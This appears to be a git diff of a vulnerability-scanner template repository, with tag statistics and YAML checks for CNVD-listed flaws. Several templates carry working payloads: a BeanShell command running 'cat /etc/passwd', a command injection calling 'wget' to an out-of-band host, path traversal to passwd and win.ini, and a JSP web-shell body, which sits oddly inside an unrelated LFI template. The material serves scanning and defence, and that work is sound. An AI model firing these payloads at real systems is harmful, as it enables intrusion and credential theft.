camunda | 1 | | | | | | | | | +| suprema | 1 | | | | | | | | | +| locations | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| apigee | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| fatwire | 1 | | | | | | | | | +| admin | 1 | | | | | | | | | +| dribbble | 1 | | | | | | | | | +| cvnd2018 | 1 | | | | | | | | | +| wowza | 1 | | | | | | | | | +| interactsh | 1 | | | | | | | | | +| zeppelin | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| speed | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| etcd | 1 | | | | | | | | | +| saml | 1 | | | | | | | | | +| sponip | 1 | | | | | | | | | +| php-fusion | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | | jsp | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| pirelli | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| bitrise | 1 | | | | | | | | | +| fastly | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| secmail | 1 | | | | | | | | | +| gurock | 1 | | | | | | | | | +| ignition | 1 | | | | | | | | | +| oam | 1 | | | | | | | | | +| petfinder | 1 | | | | | | | | | +| zipkin | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| zentral | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| dvdFab | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| solarview | 1 | | | | | | | | | +| caseaware | 1 | | | | | | | | | +| thinkserver | 1 | | | | | | | | | +| webpconverter | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| musicstore | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| pivotaltracker | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| edgeos | 1 | | | | | | | | | +| trello | 1 | | | | | | | | | +| place | 1 | | | | | | | | | +| osquery | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| panasonic | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| console | 1 | | | | | | | | | +| cx | 1 | | | | | | | | | +| jinfornet | 1 | | | | | | | | | +| biostar2 | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| webalizer | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| cname | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| franklinfueling | 1 | | | | | | | | | +| appveyor | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| primefaces | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| opensso | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| browserless | 1 | | | | | | | | | +| flask | 1 | | | | | | | | | +| mozilla | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| iconfinder | 1 | | | | | | | | | +| hirak | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| spinnaker | 1 | | | | | | | | | +| siebel | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| fanwei | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| alquist | 1 | | | | | | | | | +| supervisor | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| scanii | 1 | | | | | | | | | +| satellian | 1 | | | | | | | | | +| easyappointments | 1 | | | | | | | | | +| cscart | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| webmail | 1 | | | | | | | | | +| polarisft | 1 | | | | | | | | | +| eyoucms | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| restler | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| particle | 1 | | | | | | | | | +| zuul | 1 | | | | | | | | | +| open-redirect | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| cloudera | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| dahua | 1 | | | | | | | | | +| containers | 1 | | | | | | | | | +| block | 1 | | | | | | | | | +| faust | 1 | | | | | | | | | +| adafruit | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| aniapi | 1 | | | | | | | | | +| ymhome | 1 | | | | | | | | | +| sterling | 1 | | | | | | | | | +| yopass | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| ipvpn | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| secret | 1 | | | | | | | | | +| cucm | 1 | | | | | | | | | +| rwebserver | 1 | | | | | | | | | +| fms | 1 | | | | | | | | | +| mkdocs | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| shindig | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| adfs | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| newrelic | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| apcu | 1 | | | | | | | | | +| leostream | 1 | | | | | | | | | +| guppy | 1 | | | | | | | | | +| mirasys | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| synapse | 1 | | | | | | | | | +| meshcentral | 1 | | | | | | | | | +| adoptapet | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| cloudron | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| barracuda | 1 | | | | | | | | | +| gateway | 1 | | | | | | | | | +| apple | 1 | | | | | | | | | +| axxonsoft | 1 | | | | | | | | | +| huemagic | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| sitefinity | 1 | | | | | | | | | +| blockchain | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| cofense | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| pollbot | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| gilacms | 1 | | | | | | | | | +| ebird | 1 | | | | | | | | | +| eibiz | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| vms | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| xmpp | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| sourcecodester | 1 | | | | | | | | | +| wakatime | 1 | | | | | | | | | +| jspxcms | 1 | | | | | | | | | +| checkmarx | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| webctrl | 1 | | | | | | | | | +| txt | 1 | | | | | | | | | +| sassy | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| openweather | 1 | | | | | | | | | +| unifi | 1 | | | | | | | | | +| noptin | 1 | | | | | | | | | +| bitquery | 1 | | | | | | | | | +| kodexplorer | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| idera | 1 | | | | | | | | | +| launchdarkly | 1 | | | | | | | | | +| ipstack | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| hrsale | 1 | | | | | | | | | +| yarn | 1 | | | | | | | | | +| lumis | 1 | | | | | | | | | +| loqate | 1 | | | | | | | | | +| tinypng | 1 | | | | | | | | | +| cassandra | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | +| neo4j | 1 | | | | | | | | | +| veeam | 1 | | | | | | | | | +| formcraft3 | 1 | | | | | | | | | +| istat | 1 | | | | | | | | | +| prototype | 1 | | | | | | | | | +| pmb | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| olivetti | 1 | | | | | | | | | +| adminset | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| revslider | 1 | | | | | | | | | +| h2 | 1 | | | | | | | | | +| aerohive | 1 | | | | | | | | | +| quantum | 1 | | | | | | | | | +| bingmaps | 1 | | | | | | | | | +| tinymce | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| agegate | 1 | | | | | | | | | +| geolocation | 1 | | | | | | | | | +| eventtickets | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| newsletter | 1 | | | | | | | | | +| workreap | 1 | | | | | | | | | +| memory-pipes | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| sucuri | 1 | | | | | | | | | +| manager | 1 | | | | | | | | | +| chaos | 1 | | | | | | | | | +| ddownload | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| ucs | 1 | | | | | | | | | +| gsm | 1 | | | | | | | | | +| connect-central | 1 | | | | | | | | | +| rainloop | 1 | | | | | | | | | +| fcm | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| icinga | 1 | | | | | | | | | +| mdm | 1 | | | | | | | | | +| emerson | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| opnsense | 1 | | | | | | | | | +| h3c | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| emessage | 1 | | | | | | | | | +| ncbi | 1 | | | | | | | | | +| xamr | 1 | | | | | | | | | +| activeadmin | 1 | | | | | | | | | +| vanguard | 1 | | | | | | | | | +| richfaces | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| jwt | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| blueiris | 1 | | | | | | | | | +| projectdiscovery | 1 | | | | | | | | | +| dreamweaver | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| droneci | 1 | | | | | | | | | +| concourse | 1 | | | | | | | | | +| iserver | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 389da75091..be73077a0e 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 907 | dhiyaneshdk | 338 | cves | 913 | info | 903 | http | 2477 | -| lfi | 377 | daffainfo | 333 | vulnerabilities | 347 | high | 691 | file | 57 | -| panel | 318 | pikpikcu | 286 | exposed-panels | 318 | medium | 516 | network | 47 | -| xss | 283 | pdteam | 216 | technologies | 220 | critical | 322 | dns | 12 | -| wordpress | 270 | geeknik | 172 | exposures | 196 | low | 166 | | | -| exposure | 250 | dwisiswant0 | 156 | misconfiguration | 163 | | | | | -| rce | 230 | pussycat0x | 90 | token-spray | 127 | | | | | -| tech | 223 | gy741 | 88 | takeovers | 65 | | | | | -| cve2021 | 188 | 0x_akoko | 76 | default-logins | 63 | | | | | -| wp-plugin | 186 | princechaddha | 72 | file | 57 | | | | | +| cve | 1168 | daffainfo | 564 | cves | 1172 | info | 1198 | http | 3209 | +| panel | 517 | dhiyaneshdk | 423 | exposed-panels | 525 | high | 885 | file | 68 | +| lfi | 464 | pikpikcu | 315 | vulnerabilities | 453 | medium | 667 | network | 50 | +| xss | 371 | pdteam | 262 | technologies | 256 | critical | 415 | dns | 17 | +| wordpress | 368 | geeknik | 179 | exposures | 204 | low | 182 | | | +| rce | 296 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | | +| exposure | 294 | princechaddha | 137 | workflows | 187 | | | | | +| cve2021 | 289 | 0x_akoko | 134 | token-spray | 155 | | | | | +| tech | 272 | gy741 | 119 | default-logins | 96 | | | | | +| wp-plugin | 268 | pussycat0x | 116 | file | 68 | | | | | diff --git a/cnvd/2018/CNVD-2018-13393.yaml b/cnvd/2018/CNVD-2018-13393.yaml new file mode 100644 index 0000000000..0cce50c757 --- /dev/null +++ b/cnvd/2018/CNVD-2018-13393.yaml @@ -0,0 +1,25 @@ +id: CNVD-2018-13393 + +info: + name: Metinfo LFI + author: ritikchaddha + severity: high + reference: + - https://paper.seebug.org/676/ + tags: metinfo,cnvd,cvnd2018,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/include/thumb.php?dir=http\..\admin\login\login_check.php' + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("
" +excuteCmd(request.getParameter("{{randstr}}")) + "");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce + + - | + GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_1, "htmoffice operate")' + - 'contains(body_2, "Windows IP")' + condition: and + +# Enhanced by mp on 2022/05/12 diff --git a/cnvd/2019/CNVD-2019-32204.yaml b/cnvd/2019/CNVD-2019-32204.yaml new file mode 100644 index 0000000000..ec365a5f8c --- /dev/null +++ b/cnvd/2019/CNVD-2019-32204.yaml @@ -0,0 +1,30 @@ +id: CNVD-2019-32204 + +info: + name: Fanwei e-cology <=9.0 - Remote Code Execution + author: daffainfo + severity: critical + description: Fanwei e-cology <=9.0 is susceptible to remote code execution vulnerabilities. Remote attackers can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system. + reference: + - https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: fanwei,cnvd,cnvd2019,rce + +requests: + - raw: + - | + POST /bsh.servlet.BshServlet HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw + + matchers: + - type: regex + regex: + - "root:.*:0:0:" + +# Enhanced by mp on 2022/05/12 diff --git a/cnvd/CNVD-2020-23735.yaml b/cnvd/2020/CNVD-2020-23735.yaml similarity index 83% rename from cnvd/CNVD-2020-23735.yaml rename to cnvd/2020/CNVD-2020-23735.yaml index 88cf7d0df7..2a5823431c 100644 --- a/cnvd/CNVD-2020-23735.yaml +++ b/cnvd/2020/CNVD-2020-23735.yaml @@ -5,8 +5,9 @@ info: author: princechaddha severity: medium description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information. - reference: https://www.cnvd.org.cn/flaw/show/2025171 - tags: xunchi,lfi,cnvd + reference: + - https://www.cnvd.org.cn/flaw/show/2025171 + tags: xunchi,lfi,cnvd,cnvd2020 requests: - method: GET @@ -18,9 +19,10 @@ requests: - type: status status: - 200 + - type: word + part: body words: - "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N" - "display_errors" - part: body - condition: and \ No newline at end of file + condition: and diff --git a/cnvd/2020/CNVD-2020-46552.yaml b/cnvd/2020/CNVD-2020-46552.yaml new file mode 100644 index 0000000000..02a98ac205 --- /dev/null +++ b/cnvd/2020/CNVD-2020-46552.yaml @@ -0,0 +1,33 @@ +id: CNVD-2020-46552 + +info: + name: Sangfor EDR - Remote Code Execution + author: ritikchaddha + severity: critical + description: Sangfor Endpoint Monitoring and Response Platform (EDR) contains a remote code execution vulnerability. An attacker could exploit this vulnerability by constructing an HTTP request which could execute arbitrary commands on the target host. + reference: + - https://www.modb.pro/db/144475 + - https://blog.csdn.net/bigblue00/article/details/108434009 + - https://cn-sec.com/archives/721509.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: + cwe-id: CWE-77 + tags: cnvd,cnvd2020,sangfor,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php" + + matchers: + - type: dsl + dsl: + - 'contains(body, "$show_input = function($info)")' + - 'contains(body, "$strip_slashes($host)")' + - 'contains(body, "Log Helper")' + - 'status_code == 200' + condition: and + +# Enhanced by mp on 2022/05/18 diff --git a/cnvd/CNVD-2020-56167.yaml b/cnvd/2020/CNVD-2020-56167.yaml similarity index 83% rename from cnvd/CNVD-2020-56167.yaml rename to cnvd/2020/CNVD-2020-56167.yaml index 1fe06f6c1c..964ed36f40 100644 --- a/cnvd/CNVD-2020-56167.yaml +++ b/cnvd/2020/CNVD-2020-56167.yaml @@ -4,8 +4,9 @@ info: name: Ruijie Smartweb Default Password author: pikpikcu severity: low - reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167 - tags: ruijie,default-login,cnvd + reference: + - https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167 + tags: ruijie,default-login,cnvd,cnvd2020 requests: - method: POST @@ -17,12 +18,11 @@ requests: matchers-condition: and matchers: - - type: word + part: body words: - "Level was: LEVEL15" - "/WEB_VMS/LEVEL15/" - part: body condition: and - type: status diff --git a/cnvd/CNVD-2020-62422.yaml b/cnvd/2020/CNVD-2020-62422.yaml similarity index 75% rename from cnvd/CNVD-2020-62422.yaml rename to cnvd/2020/CNVD-2020-62422.yaml index 736770f82c..0194c6d8b8 100644 --- a/cnvd/CNVD-2020-62422.yaml +++ b/cnvd/2020/CNVD-2020-62422.yaml @@ -1,11 +1,12 @@ id: CNVD-2020-62422 info: - name: Seeyon readfile(CNVD-2020-62422) + name: Seeyon - Arbitrary File Retrieval author: pikpikcu severity: medium - reference: https://blog.csdn.net/m0_46257936/article/details/113150699 - tags: lfi,cnvd + reference: + - https://blog.csdn.net/m0_46257936/article/details/113150699 + tags: lfi,cnvd,cnvd2020,seeyon requests: - method: GET @@ -17,13 +18,15 @@ requests: - type: status status: - 200 + - type: word + part: header words: - "application/x-msdownload" condition: and - part: header + - type: word + part: body words: - "ctpDataSource.password" condition: and - part: body \ No newline at end of file diff --git a/cnvd/2020/CNVD-2020-67113.yaml b/cnvd/2020/CNVD-2020-67113.yaml new file mode 100644 index 0000000000..547b8d305b --- /dev/null +++ b/cnvd/2020/CNVD-2020-67113.yaml @@ -0,0 +1,44 @@ +id: CNVD-2020-67113 + +info: + name: H5S CONSOLE Unauthorized Access Vulnerability (CNVD-2020-67113) + author: ritikchaddha + severity: high + description: Zero Vision Technology (Shanghai) Co., Ltd. H5S CONSOLE Exists Unauthorized Access Vulnerability + reference: + - https://vul.wangan.com/a/CNVD-2020-67113 + metadata: + shodan-query: http.title:"H5S CONSOLE" + tags: h5s,unauth,h5sconsole,cnvd,cnvd2020 + +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/GetSrc" + - "{{BaseURL}}/api/v1/GetDevice" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'strUser' + - 'strPasswd' + condition: and + + - type: word + part: body + words: + - 'H5_AUTO' + - 'H5_DEV' + condition: or + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 diff --git a/cnvd/CNVD-2020-68596.yaml b/cnvd/2020/CNVD-2020-68596.yaml similarity index 59% rename from cnvd/CNVD-2020-68596.yaml rename to cnvd/2020/CNVD-2020-68596.yaml index 56cd6901fd..b1d96de058 100644 --- a/cnvd/CNVD-2020-68596.yaml +++ b/cnvd/2020/CNVD-2020-68596.yaml @@ -1,11 +1,17 @@ id: CNVD-2020-68596 info: - name: WeiPHP 5.0 Path Traversal + name: WeiPHP 5.0 - Path Traversal author: pikpikcu - severity: critical - reference: http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html - tags: weiphp,lfi,cnvd + description: WeiPHP 5.0 is susceptible to directory traversal attacks. + severity: high + reference: + - http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 + tags: weiphp,lfi,cnvd,cnvd2020 requests: - raw: @@ -34,9 +40,11 @@ requests: matchers: - type: word + part: body words: - https://weiphp.cn - WeiPHP - DB_PREFIX condition: and - part: body \ No newline at end of file + +# Enhanced by mp on 2022/05/12 diff --git a/cnvd/2021/CNVD-2021-01931.yaml b/cnvd/2021/CNVD-2021-01931.yaml new file mode 100644 index 0000000000..af7aa8ed08 --- /dev/null +++ b/cnvd/2021/CNVD-2021-01931.yaml @@ -0,0 +1,30 @@ +id: CNVD-2021-01931 + +info: + name: Ruoyi Management System - Arbitrary File Retrieval + author: daffainfo,ritikchaddha + severity: high + reference: + - https://disk.scan.cm/All_wiki/%E4%BD%A9%E5%A5%87PeiQi-WIKI-POC-2021-7-20%E6%BC%8F%E6%B4%9E%E5%BA%93/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%20CNVD-2021-01931.md?hash=zE0KEPGJ + tags: ruoyi,lfi,cnvd,cnvd2021 + +requests: + - method: GET + path: + - "{{BaseURL}}/common/download/resource?resource=/profile/../../../../etc/passwd" + - "{{BaseURL}}/common/download/resource?resource=/profile/../../../../Windows/win.ini" + + matchers-condition: or + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0" + + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and diff --git a/cnvd/2021/CNVD-2021-09650.yaml b/cnvd/2021/CNVD-2021-09650.yaml new file mode 100644 index 0000000000..528666e80d --- /dev/null +++ b/cnvd/2021/CNVD-2021-09650.yaml @@ -0,0 +1,32 @@ +id: CNVD-2021-09650 + +info: + name: Ruijie EWEB Gateway Platform - Remote Command Injection + author: daffainfo + severity: critical + description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks. + reference: + - http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: ruijie,cnvd,cnvd2021,rce + +requests: + - raw: + - | + POST /guest_auth/guestIsUp.php + Host: {{Hostname}} + + mac=1&ip=127.0.0.1|wget {{interactsh-url}} + + unsafe: true + matchers: + - type: word + part: interactsh_protocol + name: http + words: + - "http" + +# Enhanced by mp on 2022/05/12 diff --git a/cnvd/CNVD-2021-10543.yaml b/cnvd/2021/CNVD-2021-10543.yaml similarity index 79% rename from cnvd/CNVD-2021-10543.yaml rename to cnvd/2021/CNVD-2021-10543.yaml index a29fe66f5a..8a4354683a 100644 --- a/cnvd/CNVD-2021-10543.yaml +++ b/cnvd/2021/CNVD-2021-10543.yaml @@ -4,8 +4,9 @@ info: name: EEA Information Disclosure author: pikpikcu severity: high - reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543 - tags: config,exposure,cnvd + reference: + - https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543 + tags: config,exposure,cnvd,cnvd2021 requests: - method: GET @@ -14,7 +15,6 @@ requests: matchers-condition: and matchers: - - type: regex regex: - "